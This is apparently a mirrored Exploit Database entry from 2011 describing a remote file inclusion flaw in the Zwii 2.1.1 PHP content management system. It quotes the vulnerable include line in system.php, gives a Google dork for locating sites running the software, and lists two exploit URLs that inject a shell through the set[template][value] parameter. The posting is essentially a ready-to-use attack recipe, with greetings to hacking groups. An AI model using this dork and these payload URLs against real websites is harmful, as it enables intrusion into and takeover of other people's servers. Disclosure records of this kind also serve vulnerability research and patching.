Zwii 2.1.1 – Remote File Inclusion

• Exploit Database
• 18 阅读

• 作者： Abdi Mohamed
  日期： 2011-01-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15945/

• # Exploit Title: Zwii v 2.1.1 Remote file include vulnerbility
  # Google Dork: Propulsé par Zwii 2.1.1
  # Date: 08/01/2011
  # Author: Abdi Mohamed
  # Software Link: http://scripts.toocharger.com/fiches/scripts/zwii/5147.htm
  # Version: v 2.1.1
  # Tested on: ubuntu + centos 
  # Email : abdimohamed@hotmail.fr - mrabdimohamed@gmail.com
  #######################################################
  
  Fichier : system.php
  http://localhost/y/system/system.php
  
  Code : 
  
  // Importe la base de données
  include("./system/data/settings.php");
  include("./system/data/articles.php");
  include("./system/data/accounts.php");
  include("./system/data/positions.php");
  include("./system/data/ip.php");
  include("./templates/". $set["template"]["value"] ."/info.php");
  
  Exploit:
  http://localhost/y/system/system.php?set=(your shell)
  http://localhost/y/system/system.php?set[template][value]=(your shell)
  
  
  
  #######################################################
  # Gr33tz : meher assel - xa7m3d - yahya idriss - houssem jrad - all tunisien hacker's
  # Gr33tz : all member | v4-team.com - sec-war.com - hacktn.com
  #######################################################